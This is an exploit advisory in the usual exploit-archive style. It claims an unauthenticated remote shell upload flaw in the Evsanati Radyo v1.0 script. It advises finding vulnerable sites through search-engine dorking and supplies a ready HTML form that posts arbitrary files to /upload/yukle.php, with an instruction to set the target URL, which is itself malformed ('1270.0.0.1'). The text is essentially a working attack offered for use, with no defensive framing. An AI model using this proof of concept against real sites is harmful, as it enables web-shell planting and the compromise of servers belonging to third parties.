Authored by indoushka

Evsanati Radyo version 1.0 suffers from a remote shell upload vulnerability.

====================================================================================================================================
| # Title : evsanati radyo v1.0 Remote File Upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fran├žais V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |
| # Vendor : https://donanimplus.com/b/evsanati-v1-0-radyo-scripti |
====================================================================================================================================

poc :

[+] Dorking ─░n Google Or Other Search Enggine

[+] infected file : /upload/yukle.php

[+] Unauthorized administrator access. Allows any visitor to upload malicious files and run them

[+] Some web sites have deleted the upload file so use this code ( note : use after login )

[+] line 5 set your target

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>

<form action="http://1270.0.0.1/gazipasayalcinemlakcom/upload/yukle.php" method="post" enctype="multipart/form-data">


<div align="center">


<table border="0" cellspacing="0" cellpadding="0">
<tr>
<td><b>Resmi Secin :</b></td>
<td>&nbsp;<input type="file" name="dosya" size="20"></td>
</tr>
<tr>
<td></td>
<td><br /><input type="submit" value="Yukle" style="width:220px;"></td>
</tr>
</table>


</div>

</form>


Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |
=======================================================================================================================================